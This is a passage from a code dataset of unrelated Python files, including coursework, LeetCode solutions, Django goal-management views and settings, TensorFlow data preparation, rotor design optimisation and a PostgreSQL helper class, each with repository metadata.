label)\n","repo_name":"FesonX/cn-text-classifier","sub_path":"tools/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"61"} +{"seq_id":"21259951157","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    @Author: Xingqi Tang\n    @Created: 2018/5/16 18:52\n    @Name: fifo\n    @Project: neu_curriculum\n\"\"\"\nimport rand_page\n\nseries_size = 20\nrandom_size = 7\n\n\ndef fifo(buffer, access_s):\n    lst = []\n    count = 0\n    # flag = 0\n\n    print(\"FIFO algorithm:\\n\")\n    for s in access_s:\n        if s in lst[::2]:\n            list_a = lst[::2]\n            lst[list_a.index(s) * 2 + 1] += 1\n            print(s, ' ', lst[::2])\n            continue\n        else:\n            list_b = lst[1::2]\n\n            if len(lst) < 2 * buffer:\n                lst.append(s)\n                lst.append(1)\n            else:\n                c = list_b.index(max(list_b))\n                lst[2 * c] = s\n                lst[2 * c + 1] = 1\n            print(s, ' ', lst[::2], 'MISSING ')\n            count += 1\n    print(\"memory_size is : {}\".format(buffer))\n    print(\"fifo missing rate is:{:.2f}\\n\".format(count / len(access_s)))\n\n\n# def main():\n    # access_series = [7, 0, 1, 2, 0, 3, 0, 4, 2, 3, 0, 3, 2, 1, 2, 0, 1, 7, 0, 1]\n    # access_series = rand_page.random_list(0, random_size, series_size","repo_name":"txqzzz/neu_curriculum","sub_path":"operating-system/lab4/page_replacement_algorithm/fifo.py","file_name":"fifo.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70758340356","text":"class Solution:\n    def eraseOverlapIntervals(self, intervals: List[List[int]]) -> int:\n        intervals.sort()\n        prev = intervals[0]\n        cnt = 0\n        for ii in intervals[1:]:\n            if prev[1] <= ii[0]:\n                prev = ii\n            elif prev[0] <= ii[0] and prev[1] >= ii[1]:\n                prev = ii\n                cnt += 1\n            elif prev[0] <= ii[0] and prev[1] <= ii[1]:\n                cnt += 1\n        return cnt","repo_name":"aso2001/LeetCode","sub_path":"0435-non-overlapping-intervals/0435-non-overlapping-intervals.py","file_name":"0435-non-overlapping-intervals.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23396056010","text":"organizacion = \"con You Tube\"\n#the three are equivalent\n# print(\"se puede aprender a programar usando \" + organizacion)\n# print(\"se puede aprender a programar 
usando {}\".format(organizacion))\n# print( f\"se puede aprender a programar usando {organizacion}\")\n\n#input can be used to ask the user to enter information\nadj = input(\"adjetivo: \")\nverbo1= input(\"verbo: \")\nverbo2= input(\"verbo 2: \")\nsustantivoP = input(\"sustantivo (plural): \")\n\n#using alt + z a long line is split into several so it looks nice\n\nlistaloca = f\"¡programar es tan {adj}! siempre me emocina porque me encanta {verbo1} problemas. ¡aprende a {verbo2} con You Tube y alcanza tus {sustantivoP}\"\n\nprint(listaloca)","repo_name":"44685740-1/Recursos-y-Proyectos-Python","sub_path":"Proyectos Phython yt 1/historias.locas.py","file_name":"historias.locas.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27497434383","text":"\nfrom django.utils import timezone\nfrom django.utils.translation import gettext_lazy as _\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import action\n\nfrom services.views import TemplateViewSet, TemplateAPIView\nfrom services.pagination import CustomPageNumberPagination\nfrom department.models import Department\nfrom department.permissions import IsBelongToDepartment\nfrom .models import Goal, GoalLastEdit\nfrom .serializers import GoalDetailSerializer, GoalSerializer, EmptySerializer, GoalReviewSerializer\nfrom .serializers import GoalUpdateSerializer, GoalPercentageSerializer, ReviewSerializer\nfrom .permissions import CanCreateGoal, CanViewGoal, CanViewAllGoals, IsGoalAndUserDepartmentSame\nfrom .permissions import CanChangeGoal, CanDeleteGoal, CanChangeGoalStatus, CanAddReview\n\nclass GoalViewSet(TemplateViewSet, CustomPageNumberPagination):\n    model = Goal\n\n    def create(self, request):\n        user = request.user\n        serializer = self.get_serializer_class()(data=request.data)\n        if serializer.is_valid():\n            serializer.create(created_by=user)\n            return Response(data=serializer.data, status=status.HTTP_201_CREATED)\n        return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n    def list(self, request):\n        goals = Goal.objects.filter_from_query_params(request)\n        page = self.paginate_queryset(queryset=goals, request=request)\n        serializer = self.get_serializer_class()(instance=page, many=True)\n        return self.get_paginated_response(data=serializer.data)\n\n    def retrieve(self, request, pk):\n        goal = self.get_object(pk=pk)\n        serializer = self.get_serializer_class()(instance=goal)\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    def update(self, request, pk):\n        goal = self.get_object(pk=pk)\n        serializer = self.get_serializer_class()(instance=goal, data=request.data)\n        if serializer.is_valid():\n            serializer.update()\n            GoalLastEdit.objects.update_or_create(\n                goal=goal,\n                defaults={\n                    \"edited_by\": request.user,\n                    \"edited_at\": timezone.now()\n                }\n            )\n            return Response(serializer.data, status=status.HTTP_202_ACCEPTED)\n        return Response({\"field_errors\": serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n    def destroy(self, request, pk):\n        goal = self.get_object(pk=pk)\n        goal.delete()\n        return Response(data={\"detail\": [_(\"Goal Delete Successful\")]}, status=status.HTTP_202_ACCEPTED)\n\n    @action(methods=[\"patch\"], detail=True, url_path='accept-goal')\n    def accept_goal(self, request, pk):\n        goal = self.get_object(pk=pk)\n        goal.accept_goal()\n        return Response(data={\"detail\": [_(\"Goal accepted\")]}, 
status=status.HTTP_200_OK)\n\n @action(methods=[\"patch\"], detail=True, url_path='reject-goal')\n def reject_goal(self, request, pk):\n goal = self.get_object(pk=pk)\n goal.reject_goal()\n return Response(data={\"detail\": [_(\"Goal pending status set\")]}, status=status.HTTP_200_OK)\n\n @action(methods=[\"patch\"], detail=True, url_path='update-achivement-percentage')\n def update_achivement_percentage(self, request, pk):\n goal = self.get_object(pk=pk)\n serializer = self.get_serializer_class()(data=request.data)\n if serializer.is_valid():\n serializer.update_percentage(instance=goal)\n return Response(data={\"detail\": [_(\"Goal completion percentage update successful\")]}, status=status.HTTP_202_ACCEPTED)\n return Response(data={\"field_errors\": serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n\n def get_permissions(self):\n permissions = []\n if self.action == 'create':\n permissions += [CanCreateGoal]\n elif self.action == 'list':\n permissions += [CanViewAllGoals]\n elif self.action == 'retrieve':\n permissions += [CanViewAllGoals|(IsGoalAndUserDepartmentSame&CanViewGoal)]\n elif self.action == 'destroy':\n permissions += [CanDeleteGoal, IsGoalAndUserDepartmentSame]\n elif self.action in ['accept_goal', 'reject_goal']:\n permissions += [CanChangeGoalStatus, CanViewAllGoals]\n elif self.action in ['update_achivement_percentage', 'update']:\n permissions += [CanChangeGoal, IsGoalAndUserDepartmentSame]\n return [permission() for permission in permissions]\n\n def get_serializer_class(self):\n if self.action in ['reject_goal', 'accept_goal']:\n return EmptySerializer\n elif self.action == 'update_achivement_percentage':\n return GoalPercentageSerializer\n elif self.action == 'update':\n return GoalUpdateSerializer\n elif self.action == 'add_review_on_goal':\n return GoalReviewSerializer\n elif self.action == 'retrieve':\n return GoalDetailSerializer\n return GoalSerializer\n\n\nclass DepartmentGoals(TemplateAPIView, CustomPageNumberPagination):\n model = Department\n serializer_class = GoalSerializer\n permission_classes = [CanViewAllGoals|(IsBelongToDepartment&CanViewGoal)]\n\n def get(self, request, department_pk):\n department = self.get_object(pk=department_pk)\n department_goals = Goal.objects.get_departmnet_goals(department=department)\n filtered_department_goals = department_goals.filter_from_query_params(request)\n page = self.paginate_queryset(queryset=filtered_department_goals, request=request)\n serializer = self.serializer_class(instance=page, many=True)\n return self.get_paginated_response(data=serializer.data)\n\n\nclass AddReviewView(TemplateAPIView):\n model = Goal\n serializer_class = ReviewSerializer\n permission_classes = [CanAddReview|(IsGoalAndUserDepartmentSame&CanViewGoal)]\n\n def post(self, request, goal_pk):\n goal = self.get_object(pk=goal_pk)\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid():\n review = serializer.create(reviewed_by=request.user, goal=goal)\n response_serializer = self.serializer_class(instance=review)\n return Response(data=response_serializer.data, status=status.HTTP_201_CREATED)\n return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n","repo_name":"pi3o1416/task-management","sub_path":"goal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20701224709","text":"#!/usr/bin/env python\n\n# This script takes the raw data and creates a 
dictionary in the stimuli\n# directory, both as json and pkl.\nimport os,json,pickle\n\nwith open('stimopts.json','r') as f:\n jdat = json.load(f)\n\n# Tab delimited\nPHON_MAP = {}\nwith open(jdat['phon_map']) as f:\n for line in f:\n tmp = line.strip().split()\n PHON_MAP[tmp[0]] = [int(x) for x in tmp[1:]]\n\nSTIM = {}\nwith open(jdat['stim_master'], 'r') as f:\n with open(jdat['sem_map']) as fsem:\n for line in f:\n linesem = fsem.readline()\n sem = [int(x) for x in linesem.strip().split('\\t')]\n data = line.strip().split()\n\n phon_code = data[2]\n phon = []\n for p in phon_code:\n phon.append(PHON_MAP[p])\n\n STIM[data[0]] = {\n 'orth_code': data[1],\n 'phon_code': data[2],\n 'freq': int(data[3]),\n 'phon': phon,\n 'sem': sem\n }\n\nHOMO = {}\nfor word,d in STIM.items():\n try:\n HOMO[d['phon_code']].append(word)\n except KeyError:\n HOMO[d['phon_code']] = [word]\n\nfor word,homo in HOMO.items():\n if len(homo) == 1:\n del HOMO[word]\n\npath = os.path.join('stimuli','SAE')\n\nppath = os.path.join(path,'pkl','words_master.pkl')\nwith open(ppath,'wb') as f:\n pickle.dump(STIM,f)\n\njpath = os.path.join(path,'json','words_master.json')\nwith open(jpath,'wb') as f:\n json.dump(STIM,f,indent=2, separators=(',', ': '))\n\nppath = os.path.join(path,'pkl','homo_master.pkl')\nwith open(ppath,'wb') as f:\n pickle.dump(HOMO,f)\n\njpath = os.path.join(path,'json','homo_master.json')\nwith open(jpath,'wb') as f:\n json.dump(HOMO,f,indent=2, separators=(',', ': '))\n","repo_name":"crcox/aae_modeling_scripts","sub_path":"py/GenerateSAE_master.py","file_name":"GenerateSAE_master.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7661901758","text":"import os\nfrom tempfile import mktemp\nimport django\n\nGEO_CACHE = '~build/cache'\n\nDEBUG = True\nSTATIC_URL = '/static/'\n\nSITE_ID = 1\nROOT_URLCONF = 'tests.urls'\nSECRET_KEY = 'abc'\n# STATIC_ROOT = mktemp('static')\n# MEDIA_ROOT = mktemp('media')\n\ngettext = lambda s: s\nLANGUAGES = (\n ('de', gettext('German')),\n ('en', gettext('English')),\n)\n\nSOUTH_MIGRATION_MODULES = {\n 'geo': 'geo.south_migrations',\n}\nINSTALLED_APPS = [\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.staticfiles',\n 'django.contrib.admin',\n 'south',\n 'geo']\n\nif django.VERSION[:2] >= (1,7):\n INSTALLED_APPS.remove('south')\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nTEMPLATE_DIRS = ['tests/templates']\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'full': {\n 'format': '%(levelname)-8s: %(asctime)s %(module)s %(process)d %(thread)d %(message)s'\n },\n 'verbose': {\n 'format': '%(levelname)-8s: %(asctime)s %(name)-25s %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)-8s %(asctime)s %(name)-25s %(funcName)s %(message)s'\n },\n 'debug': {\n 'format': '%(levelno)s:%(levelname)-8s %(name)s %(funcName)s:%(lineno)s:: %(message)s'\n }\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'null': {\n 'level': 'DEBUG',\n 'class': 'django.utils.log.NullHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'debug'\n }\n },\n 'loggers': {\n 'concurrency': 
{\n 'handlers': ['null'],\n 'propagate': False,\n 'level': 'DEBUG'\n }\n }\n}\n\nDBNAME = os.environ.get('DBNAME', 'geo')\ndb = os.environ.get('DBENGINE', 'postgres')\nif db == 'postgres':\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': DBNAME,\n 'HOST': '127.0.0.1',\n 'PORT': '',\n 'USER': 'postgres',\n 'PASSWORD': ''}}\nelif db == 'mysql':\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': DBNAME,\n 'HOST': '127.0.0.1',\n 'PORT': '',\n 'USER': 'root',\n 'PASSWORD': '',\n 'CHARSET': 'utf8',\n 'COLLATION': 'utf8_general_ci',\n 'TEST_CHARSET': 'utf8',\n 'TEST_COLLATION': 'utf8_general_ci'}}\nelse:\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': '%s.sqlite' % DBNAME,\n 'HOST': '',\n 'PORT': ''}}\n","repo_name":"saxix/django-geo","sub_path":"tests/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"61"} +{"seq_id":"71669853954","text":"# Just for playing around with the callback function, please remove\nimport random\n\nfrom dash import dcc, html\nfrom dash.dependencies import Input, Output\n\nfrom src.graphs.graph_classes import Graphs\nfrom src.maindash import app\n\nmy_graphs = Graphs()\n\n\nclass LayoutOne:\n def make_layout(self):\n layout = html.Div(\n [\n html.Div(\n [\n dcc.Graph(id=\"regression_plot\"),\n html.P(\n \"Standard Deviation\",\n style={\"color\": \"white\", \"marginLeft\": \"20px\"},\n ),\n dcc.Slider(\n id=\"std_slider\",\n min=1979,\n max=2022,\n step=1,\n value=1979,\n marks={i: str(i) for i in range(1979, 2022, 2)},\n ),\n ]\n ),\n ]\n )\n return layout\n\n\n@app.callback(\n Output(component_id=\"regression_plot\", component_property=\"figure\"),\n [Input(component_id=\"std_slider\", component_property=\"value\")],\n)\ndef update_regression_plot(std):\n number = random.randint(0, 1)\n\n if number == 1:\n return my_graphs.iris(std)\n else:\n return my_graphs.windrose(std)\n","repo_name":"finneratzki1337/docker_python_dash_app","sub_path":"src/layouts/layout_classes.py","file_name":"layout_classes.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15085260594","text":"import tensorflow as tf\nimport cv2\nimport os\nimport numpy as np\nimport random\nimport sys\n\nfrom Constants import DATASET_SAVE_DIR\n\n\ndef createFeature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\ndef createTFRecord(lines,startIndex,rowCount,rel_path,is_cls=True):\n records = []\n print(\"--------------------------------------------------------------->><<>\")\n for j in range(startIndex, rowCount):\n line = lines[j]\n lineArr = line.split()\n imagePath = lineArr[0]\n image = cv2.imread(rel_path + imagePath + \".jpg\")\n image = image.astype(np.float32)\n image = (image - 127.5) * (1. 
/ 128.0)\n image = image.tostring()\n\n boundingBox = None\n lineArr[1] = int(lineArr[1])\n if is_cls:\n if lineArr[1] == 1 :\n originalLabel = np.array([0, 1], dtype=np.float32)\n boundingBox = lineArr[2:]\n\n boundingBox = np.array([boundingBox[0], boundingBox[1], boundingBox[2], boundingBox[3]])\n boundingBox = boundingBox.astype(np.float32)\n boundingBox = boundingBox.tostring()\n\n elif lineArr[1] == 0:\n originalLabel = np.array([1, 0], dtype=np.float32)\n boundingBox = np.array([0, 0, 0, 0], dtype=np.float32)\n boundingBox = boundingBox.tostring()\n\n else:\n originalLabel = np.array([0, 0], dtype=np.float32)\n boundingBox = lineArr[2:]\n boundingBox = np.array([boundingBox[0], boundingBox[1], boundingBox[2], boundingBox[3]])\n boundingBox = boundingBox.astype(np.float32)\n boundingBox = boundingBox.tostring()\n\n originalLabel = originalLabel.tostring()\n\n image = tf.train.BytesList(value=[image])\n label = tf.train.BytesList(value=[originalLabel])\n boundingBox = tf.train.BytesList(value=[boundingBox])\n\n imageFeature = tf.train.Feature(bytes_list=image)\n labelFeature = tf.train.Feature(bytes_list=label)\n bbFeature = tf.train.Feature(bytes_list=boundingBox)\n\n featuresDict = {\"image\": imageFeature, \"label\": labelFeature, \"boundingBox\": bbFeature}\n features = tf.train.Features(feature=featuresDict)\n example = tf.train.Example(features=features)\n records.append(example)\n return records\n\nif len(sys.argv) < 2:\n print(\"Insufficient arguments. Follow 'python3 data_gen/CreateTFRecordTraining.py '\")\n exit(0)\n\npart = sys.argv[1]\nrel_path = DATASET_SAVE_DIR+part\nrel_path_without_native = \"\"\n\nos.system(\"mkdir -p {0}\".format(part))\ndef generate_data_for_cls():\n files = [os.path.join(rel_path,\"pos_{0}.txt\".format(part)),\n os.path.join(rel_path,\"neg_{0}.txt\".format(part))]\n\n record_paths = []\n for file in files:\n with open(file,\"r\") as file:\n record_paths = record_paths+file.readlines()\n\n random.shuffle(record_paths)\n random.shuffle(record_paths)\n total_records = len(record_paths)\n\n per_file_record_count = 200000\n rec_index =0\n index = 0\n while rec_index < total_records:\n if rec_index+per_file_record_count > total_records:\n end_index = rec_index+per_file_record_count-total_records\n end_index = rec_index+per_file_record_count-end_index\n else:\n end_index = rec_index+per_file_record_count\n\n tf_records = createTFRecord(record_paths,rec_index,end_index,rel_path_without_native)\n tf_record_path = \"{0}/dataset_cls_{1}_{2}.tf\".format(part,part,index)\n tfWriter = tf.io.TFRecordWriter(tf_record_path)\n for record in tf_records:\n tfWriter.write(record.SerializeToString())\n tfWriter.close()\n\n print(\"start index {0},end index {1},size {2}\".format(rec_index,end_index,(end_index-rec_index)))\n rec_index = end_index\n index += 1\n\n\ndef generate_data_for_bb():\n files = [os.path.join(rel_path, \"pos_{0}.txt\".format(part)),\n os.path.join(rel_path, \"part_{0}.txt\".format(part))]\n\n record_paths = []\n for file in files:\n with open(file, \"r\") as file:\n record_paths = record_paths + file.readlines()\n\n random.shuffle(record_paths)\n random.shuffle(record_paths)\n total_records = len(record_paths)\n\n per_file_record_count = 200000\n rec_index = 0\n index = 0\n while rec_index < total_records:\n if rec_index + per_file_record_count > total_records:\n end_index = rec_index + per_file_record_count - total_records\n end_index = rec_index + per_file_record_count - end_index\n else:\n end_index = rec_index + per_file_record_count\n\n 
tf_records = createTFRecord(record_paths, rec_index, end_index, rel_path_without_native,is_cls=False)\n tf_record_path = \"{0}/dataset_bb_{1}_{2}.tf\".format(part,part,index)\n tfWriter = tf.io.TFRecordWriter(tf_record_path)\n for record in tf_records:\n tfWriter.write(record.SerializeToString())\n tfWriter.close()\n\n print(\"start index {0},end index {1},size {2}\".format(rec_index, end_index, (end_index - rec_index)))\n rec_index = end_index\n index += 1\n\ngenerate_data_for_cls()","repo_name":"gurushantj/MTCNN","sub_path":"data_gen/CreateTFRecordTraining.py","file_name":"CreateTFRecordTraining.py","file_ext":"py","file_size_in_byte":5219,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"29230278583","text":"from josephus_solver import JosephusSolver\n\n\ndef main():\n solver = JosephusSolver()\n for i in range(int(input())):\n solver.n = int(input())\n solver.m = int(input())\n print(f\"Usando n={solver.n}, m={solver.m}, resultado={solver.solve()}\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"oluiscabral/estrutura-de-dados","sub_path":"trab02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31121889344","text":"import concurrent.futures\nimport multiprocessing\nimport time\n\nstart = time.perf_counter()\n\ndef do_something(seconds):\n print(f\"Sleeping in {seconds} Seconds...\")\n time.sleep(seconds)\n return \"Done Sleeping...\"\n\n\nif __name__ == '__main__':\n\n # Encapsulates the execution of the function and allows us to check on it after it's been scheduled.\n with concurrent.futures.ProcessPoolExecutor() as executor:\n f1 = executor.submit(do_something, 1)\n print(f1.result())\n\n finish = time.perf_counter()\n print(f'Finished in {round(finish-start,2 )} second(s)')\n\n\n'''\n 1 Second\nProcess2 ^ |\n | |\n func() |\n 1 Second\nProcess1 ^ |\n | |\n func() |\n v\n Done\n\n------------------------- TIME ----------------------->\n\n'''","repo_name":"Vegadhardik7/Python-DSA-MySQL-Dynamic-Programming-Advance-Concepts","sub_path":"Python Multi-Processing/003 Parallel running and modification.py","file_name":"003 Parallel running and modification.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"34917533203","text":"#!/usr/bin/python3\n#alphabet\na=[\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"j\",\"k\",\"l\",\"m\",\n \"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\"v\",\"w\",\"x\",\"y\",\"z\"]\n#setup variables\nv,e,n,c=[],\"\",[],0\n#create the rotation alphabets for each letter\nfor i in a:\n #the begining part\n for ii in a[c:]:\n #add to n\n n+=ii\n #the remaining part\n for ii in a[:c]:\n #add to n\n n+=ii\n #increment c by 1\n c+=1\n #add n to v\n v+=[n]\n #clear n\n n=[]\n#the message to encode/decode\nd=input(\"message: \")\n#go through each rotation\nfor h in range(0,len(v)):\n #go through each letter of the message\n for w in d:\n if w.isalpha():\n #the character substitute\n e+=str(v[h][a.index(w)])\n else:\n e+=w\n #display the variation of message\n print(e + \" : \" + str(h) + \"|\" + str((h-26)*-1))\n #clear e\n 
e=\"\"\n","repo_name":"adrianjtempelhoff/python_practice","sub_path":"python_practice/vig_cypher/vig_cypher.py","file_name":"vig_cypher.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1176424733","text":"#\n# @lc app=leetcode.cn id=105 lang=python3\n#\n# [105] Construct Binary Tree from Preorder and Inorder Traversal\n#\n# https://leetcode-cn.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal/description/\n#\n# algorithms\n# Medium (63.88%)\n# Likes:    327\n# Dislikes: 0\n# Total Accepted:    40.8K\n# Total Submissions: 63.9K\n# Testcase Example:  '[3,9,20,15,7]\\n[9,3,15,20,7]'\n#\n# Given the preorder and inorder traversal of a tree, construct the binary tree.\n#\n# Note:\n# You may assume that duplicates do not exist in the tree.\n#\n# For example, given\n#\n# preorder traversal preorder = [3,9,20,15,7]\n# inorder traversal inorder = [9,3,15,20,7]\n#\n# Return the following binary tree:\n#\n#    3\n#   / \\\n#  9   20\n#     /  \\\n#   15    7\n#\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n\n\nclass TreeNode:\n    def __init__(self, x):\n        self.val = x\n        self.left = None\n        self.right = None\n\n\nclass Solution:\n    def buildTree(self, preorder, inorder) -> TreeNode:\n        return self.buildTree0(preorder, 0, len(preorder), inorder, 0, len(inorder))\n\n    def buildTree0(self, preorder, i, j, inorder, p, q):\n        \"\"\"Construct the original tree from preorder and inorder.\"\"\"\n        if i == j:\n            return None\n        node = TreeNode(preorder[i])\n        m = inorder.index(preorder[i])\n        node.left = self.buildTree0(preorder, i+1, i+1+m-p, inorder, p, m)\n        node.right = self.buildTree0(preorder, i+1+m-p, j, inorder, m+1, q)\n        return node\n\n\n# @lc code=end\n","repo_name":"labusi/oj-problems","sub_path":"leetcode/python/105.从前序与中序遍历序列构造二叉树.py","file_name":"105.从前序与中序遍历序列构造二叉树.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"42038581775","text":"import numpy as np \nfrom python_csdl_backend import Simulator\nfrom lsdo_rotor import RotorAnalysis, BEM, BEMParameters, AcStates, get_atmosphere, print_output\nfrom modopt.scipy_library import SLSQP\nfrom modopt.csdl_library import CSDLProblem\n\n\nrotor_analysis = RotorAnalysis()\n\nu = rotor_analysis.create_input('u', val=0, shape=(1, ))\nv = rotor_analysis.create_input('v', val=0, shape=(1, ))\nw = rotor_analysis.create_input('w', val=0, shape=(1, ))\naltitude = rotor_analysis.create_input('altitude', val=0, shape=(1, )) # in meter\n\nac_states = AcStates(u=u, v=v, w=w)\natmos = get_atmosphere(altitude=altitude)\n\nnum_nodes = 1\nnum_radial = 25\nnum_tangential = num_azimuthal = 1\nnum_blades = 2\n\nft2m = 0.3048\nm2in = 39.3701\n\ntwist_cp_guess = np.array([0.55207943, 0.35981639, 0.16753661, 0.12377559, 0.17724111, 0.07146789]) # rad\nchord_cp_guess = np.array([0.07295861, 0.10717677, 0.09075833, 0.06437597, 0.03848824, 0.02721645]) # m\n\nchord_cp = rotor_analysis.create_input('chord_cp', val=chord_cp_guess, dv_flag=True, lower=0.01, upper=0.4)\ntwist_cp = rotor_analysis.create_input('twist_cp', val=twist_cp_guess, dv_flag=True, lower=np.deg2rad(0), upper=np.deg2rad(85))\nthrust_vector = rotor_analysis.create_input('thrust_vector', val=np.array([0, 0, -1]).reshape(num_nodes, 3))\nthrust_origin = rotor_analysis.create_input('thrust_origin', val=np.array([-1.146, 1.619, -0.162]).reshape(num_nodes, 3)) # in m\npropeller_radius = rotor_analysis.create_input('propeller_radius', val=6/2*ft2m)\nrpm = rotor_analysis.create_input('rpm', val=2800, dv_flag=False, lower=800, upper=2000, scaler=1e-3)\n\nbem_parameters = BEMParameters(\n    num_radial=num_radial,\n    
num_tangential=num_tangential,\n num_blades=num_blades,\n airfoil='NACA_4412',\n use_custom_airfoil_ml=True,\n normalized_hub_radius=0.2,\n num_cp=6, \n)\n\nbem_model = BEM(\n name='bem_analysis',\n BEM_parameters=bem_parameters,\n num_nodes=1,\n)\nbem_outputs = bem_model.evaluate(ac_states=ac_states, rpm=rpm, rotor_radius=propeller_radius, thrust_vector=thrust_vector, thrust_origin=thrust_origin,\n atmosphere=atmos, blade_chord_cp=chord_cp, blade_twist_cp=twist_cp)\n\nrotor_analysis.register_output(bem_outputs)\n\n\ncsdl_model = rotor_analysis.assemble_csdl()\ncsdl_model.add_constraint('bem_analysis.T', equals=2000, scaler=1e-3)\ncsdl_model.add_constraint('bem_analysis.Q', upper=160, scaler=1e-2)\nFOM = csdl_model.declare_variable('bem_analysis.FOM', shape=(num_nodes, ))\ncsdl_model.register_output('FOM_obj', FOM * -1)\ncsdl_model.add_objective('FOM_obj')\n\nsim = Simulator(csdl_model, analytics=True)\nprob = CSDLProblem(problem_name='pav_lift_rotor_opt', simulator=sim)\noptimizer = SLSQP(\n prob, \n maxiter=150, \n ftol=1e-4,\n)\noptimizer.solve()\noptimizer.print_results()\n\nprint_output(sim, rotor_analysis)\n","repo_name":"LSDOlab/lsdo_rotor","sub_path":"lsdo_rotor/vnv_scripts/aurora_pav/pav_lift_rotor.py","file_name":"pav_lift_rotor.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"29576002770","text":"with open('05_input.txt', 'r') as file:\n seats_original = file.readlines()\n\n\nheighst_seat_id = 0\n\nfor seat in seats_original:\n seat = seat.replace('\\n', '')\n row = [0,127]\n for i in seat[0:7]:\n h = round((row[1] - row[0])/2 + 0.49)\n if i == 'F':\n row[1] -= h\n else:\n row[0] += h\n column = [0,7]\n for i in seat[7:]:\n h = round((column[1] - column[0])/2 + 0.49)\n if i == 'L':\n column[1] -= h\n else:\n column[0] += h\n seat_id = row[0] * 8 + column[0]\n if seat_id > heighst_seat_id:\n heighst_seat_id = seat_id\n\nprint(heighst_seat_id)","repo_name":"SH1RL0CK/advent_of_code","sub_path":"2020/05_puzzle1.py","file_name":"05_puzzle1.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35039137347","text":"import psycopg2\n\"\"\"\n Class to access Data Base PostGres\n\"\"\"\n\n\nclass DbClass:\n \"\"\"\n Class to be use to access the PostGres DataBase\n Methods :\n - connect()\n - execute(command)\n - commit()\n - close () - connection and cursor\n \"\"\"\n\n def __init__(self,\n hst='localhost',\n dbn='courses',\n usr='postgres',\n psw='postgres',\n prt='5432',\n conn=None,\n cur=None,\n log=False):\n \"\"\"\n Args:\n :param hst (str): PostGres host\n :param dbn (str): PostGres data base name - default = courses\n :param usr (str): PostGres user name\n :param psw (str): PostGres password\n :param prt (str): PostGres port - 5432\n :param conn (str): PostGres connection information\n :param cur (str): PostGres cursor for commands\n :param log (boolean): Print information - default = False\n \"\"\"\n self.hst = hst\n self.dbn = dbn\n self.usr = usr\n self.psw = psw\n self.prt = prt\n self.conn = conn\n self.cur = cur\n self.log = log\n\n def connect(self):\n \"\"\" Connect to database - PostGresSQL \"\"\"\n self.conn = psycopg2.connect(\n host=self.hst,\n database=self.dbn,\n user=self.usr,\n password=self.psw,\n port=self.prt\n )\n self.cur = self.conn.cursor()\n if self.log:\n print(\"Connecting to the PostgreSQL database...> '{db}' was succesfull.\\n\"\n 
